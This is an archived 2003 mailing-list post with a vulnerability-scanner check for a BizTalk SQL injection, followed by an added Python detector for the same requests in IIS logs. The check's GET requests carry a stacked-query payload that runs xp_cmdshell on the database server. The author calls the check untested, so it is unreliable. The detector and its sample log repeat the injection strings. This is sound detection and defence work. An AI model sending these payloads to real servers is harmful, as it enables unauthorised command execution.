more biztalk shtuff

From: John Lampe (j_lampeat_private)
Date: Thu May 15 2003 - 23:05:25 PDT

    And...this is allegedly what will work for the biztalk sql
    injection....again, no server to test against...
    
    John W. Lampe
    https://f00dikator.aceryder.com/
    
    >
    > port = 80;
    >
    > # Request 1: stacked-query injection through nDocumentKey on rawdocdata.asp
    > req1 = string("GET /biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec ");
    > req1 = req1 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0", "\r\n\r\n");
    >
    > # Request 2: the same injection against RawCustomSearchField.asp
    > req2 = string("GET /server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec ");
    > req2 = req2 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0", "\r\n\r\n");
    >
    > # A directory listing in the response means xp_cmdshell ran.
    > soc = open_sock_tcp(port);
    > if (soc) {
    >         q = send(socket:soc, data:req1);
    >         r = recv(socket:soc, length:1024);
    >         if ( egrep(pattern:".*Directory*", string:r) ) { security_hole(port:port); }
    >         close(soc);
    > }
    >
    > # Second request goes out on its own connection.
    > soc2 = open_sock_tcp(port);
    > if (soc2) {
    >         q = send(socket:soc2, data:req2);
    >         r = recv(socket:soc2, length:1024);
    >         if ( egrep(pattern:".*Directory*", string:r) ) { security_hole(port:port); }
    >         close(soc2);
    > }
    >
    
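    The check above only tells you whether a server is exploitable. On the defending side, the same request shape can be spotted in IIS logs: a BizTalk tracking page receiving a non-numeric nDocumentKey, or a query string carrying a stacked query and xp_cmdshell. The following is an added example, not part of John Lampe's post; it assumes the W3C log field order given in the docstring, and the log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# BizTalk tracking pages named in the post, and the parameter the request abuses.
TRACKING_PAGES = ("rawdocdata.asp", "rawcustomsearchfield.asp")
NUMERIC_PARAM = "ndocumentkey"

# Stacked-query and command-execution markers taken from the quoted request.
INJECTION_MARKERS = re.compile(r";|\bexec\b|xp_cmdshell|--", re.IGNORECASE)

def is_suspicious_request(uri_stem: str, uri_query: str) -> bool:
    """True when a tracking page receives a non-numeric nDocumentKey or the
    decoded query string carries stacked-query markers."""
    page = uri_stem.rsplit("/", 1)[-1].lower()
    if page not in TRACKING_PAGES:
        return False
    query = unquote_plus(uri_query)
    for pair in query.split("&"):           # parsed by hand so ';' stays visible
        name, _, value = pair.partition("=")
        if name.strip().lower() == NUMERIC_PARAM and not value.strip().isdigit():
            return True
    return bool(INJECTION_MARKERS.search(query))

def scan_iis_log(lines):
    """Scan IIS W3C lines (assumed field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)."""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        c_ip, stem, query = fields[2], fields[4], fields[5]
        if query == "-":                    # IIS logs an empty query as "-"
            query = ""
        if is_suspicious_request(stem, query):
            hits.append((c_ip, stem, query))
    return hits

# Constructed sample log (hosts and timestamps are made up).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-15 23:05:25 10.0.0.5 GET /biztalktracking/rawdocdata.asp nDocumentKey=1 200
2003-05-15 23:05:26 10.0.0.9 GET /biztalktracking/rawdocdata.asp nDocumentKey=1,@tnDirection=1;exec+master.dbo.xp_cmdshell+'dir+c:\\'-- 500
2003-05-15 23:05:27 10.0.0.9 GET /server/biztalktracking/RawCustomSearchField.asp nDocumentKey=1%2C%40tnDirection%3D1%3Bexec+master.dbo.xp_cmdshell 200
2003-05-15 23:05:28 10.0.0.5 GET /biztalktracking/other.asp nDocumentKey=1;exec 200
"""
```

Calling scan_iis_log(SAMPLE_LOG.splitlines()) returns the two 10.0.0.9 requests; the benign request and the hit on a non-tracking page are ignored.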



    This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:57:53 PDT